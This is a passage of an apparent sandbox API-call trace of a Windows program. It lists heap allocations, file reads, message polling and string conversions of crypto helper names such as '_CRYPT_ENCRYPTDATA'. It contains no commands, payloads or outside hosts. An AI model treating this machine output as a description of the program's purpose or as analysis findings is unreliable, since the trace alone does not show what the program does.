Flags=0x0, Size=0x8) returned 0x9c27c8 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0161.638] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0161.638] ReadFile (in: hFile=0x120, lpBuffer=0xa85008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa85008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0161.641] ReadFile (in: hFile=0x120, lpBuffer=0xa85008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa85008*, lpNumberOfBytesRead=0x87efb8*=0xf89, lpOverlapped=0x0) returned 1 [0161.641] ReadFile (in: hFile=0x120, lpBuffer=0xa85008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa85008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0161.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10f89) returned 0x9c5180 [0161.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0161.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0161.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0161.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10f89) returned 0x9d6118 [0161.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.644] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0161.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10f89) returned 0x9c5180 [0161.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0161.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0161.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.644] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0161.645] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.645] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0161.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10f89) returned 0x9c5180 [0161.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0161.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0161.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0161.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0161.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0161.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0161.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0161.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0161.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0161.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10f89) returned 0x9e70b0 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.647] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0161.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0161.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0161.647] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0161.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0161.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.648] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0161.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2878 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0161.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.648] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0161.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.649] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0161.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0161.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0161.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0161.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.650] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0161.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0161.651] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0161.651] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0161.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 